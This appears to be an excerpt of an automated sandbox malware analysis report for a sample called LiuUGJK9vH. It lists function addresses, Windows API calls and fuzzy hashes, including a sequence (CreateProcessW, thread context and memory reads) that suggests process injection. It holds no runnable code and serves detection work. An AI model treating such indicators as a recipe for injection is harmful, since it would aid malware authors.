                      • Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                      • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                      Function 00BA3288 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNEL32(?,00000000), ref: 00BA3A43
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BA3AD9
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00BA3AFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                      • Instruction ID: e37224bf93bb721a756be2eb3db223397daa3225ef946c7690f1a3216c6fbf7a
                      • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                      • Instruction Fuzzy Hash: 43620E30A14658DBEB24CFA4C841BDEB3B6EF59700F1091A9E10DEB390E7759E81CB59
                      Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                      • String ID:
                      • API String ID: 1559183368-0
                      • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                      • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                      • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                      • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                      Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                      • _free.LIBCMT ref: 0043E263
                      • _free.LIBCMT ref: 0043E2AA
                        • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$CurrentDirectoryLibraryLoad
                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                      • API String ID: 2861923089-1757145024
                      • Opcode ID: bcfd99442a652f6782b4065f3a7d06b8823211b735613b54d5c60ab115bb5f0d
                      • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                      • Opcode Fuzzy Hash: bcfd99442a652f6782b4065f3a7d06b8823211b735613b54d5c60ab115bb5f0d
                      • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                      Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                      • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 3677997916-824357125
                      • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                      • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                      • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                      • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                      Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                        • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                        • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                      • _free.LIBCMT ref: 004696A2
                      • _free.LIBCMT ref: 004696A9
                      • _free.LIBCMT ref: 00469714
                        • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                        • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                      • _free.LIBCMT ref: 0046971C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                      • String ID:
                      • API String ID: 1552873950-0
                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                      • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                      • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                      Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                      • String ID:
                      • API String ID: 2782032738-0
                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                      • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                      • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                      Function 02F5B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                      Download Yara Rule
                      APIs
                      • SetFilePointerEx.KERNEL32 ref: 02F5B2BA
                      • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 02F5B2E0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: File$PointerWrite
                      • String ID:
                      • API String ID: 539440098-0
                      • Opcode ID: 29836c3b7a5efa2b2ea9f813b61672824d9de1df1498a6e0ee4eba125ad84e8d
                      • Instruction ID: e1cbd5545c26583b00554aece137add99e18aba717573ec057ae08a938aee31b
                      • Opcode Fuzzy Hash: 29836c3b7a5efa2b2ea9f813b61672824d9de1df1498a6e0ee4eba125ad84e8d
                      • Instruction Fuzzy Hash: 5231A77190C3649EE7118B25C81572FBFE06F8269CF48854DEFD496289D3B58408CB63
                      Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: AU3!P/I$EA06
                      • API String ID: 4104443479-1914660620
                      • Opcode ID: a4a93ea115200c971a8861d8d6b54e97b5cb82f41a73f581a0e127d2f66012de
                      • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                      • Opcode Fuzzy Hash: a4a93ea115200c971a8861d8d6b54e97b5cb82f41a73f581a0e127d2f66012de
                      • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                      Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 0043EA39
                      • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                        • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                        • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Name$Path$FileFullLongOpen_memset
                      • String ID: X
                      • API String ID: 3777226403-3081909835
                      • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                      • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                      • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                      • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                      Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __fread_nolock_memmove
                      • String ID: EA06
                      • API String ID: 1988441806-3962188686
                      • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                      • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                      • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                      • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                      Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Temp$FileNamePath
                      • String ID: aut
                      • API String ID: 3285503233-3010740371
                      • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                      • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                      • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                      • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                      Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                      • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                      • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                      • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                      Function 02F77DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ComputerName
                      • String ID:
                      • API String ID: 3545744682-0
                      • Opcode ID: 09e8a2b1c0852702022cd97730217519c9d7ed83a0ef821d4325b0a77c5d0e76
                      • Instruction ID: 154236f2239b67ec38df89099c3b24bb58314f863a225c758a3658d95b412f27
                      • Opcode Fuzzy Hash: 09e8a2b1c0852702022cd97730217519c9d7ed83a0ef821d4325b0a77c5d0e76
                      • Instruction Fuzzy Hash: AB212531E693406BFA3576148C0AFB5FB356B51BD4F88448BE78B561E1D3A46818C263
                      Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00404370
                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconNotifyShell_$_memset
                      • String ID:
                      • API String ID: 1505330794-0
                      • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                      • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                      • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                      • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                      Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __FF_MSGBANNER.LIBCMT ref: 00425733
                        • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                        • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                      • __NMSG_WRITE.LIBCMT ref: 0042573A
                        • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                        • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                        • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                        • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                        • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                      • RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                      • String ID:
                      • API String ID: 1372826849-0
                      • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                      • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                      • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                      • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                      Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                      • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                      • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                      • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                      • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                      • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                      Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00468D1B
                        • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                        • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                      • _free.LIBCMT ref: 00468D2C
                      • _free.LIBCMT ref: 00468D3E
                      Memory Dump Source
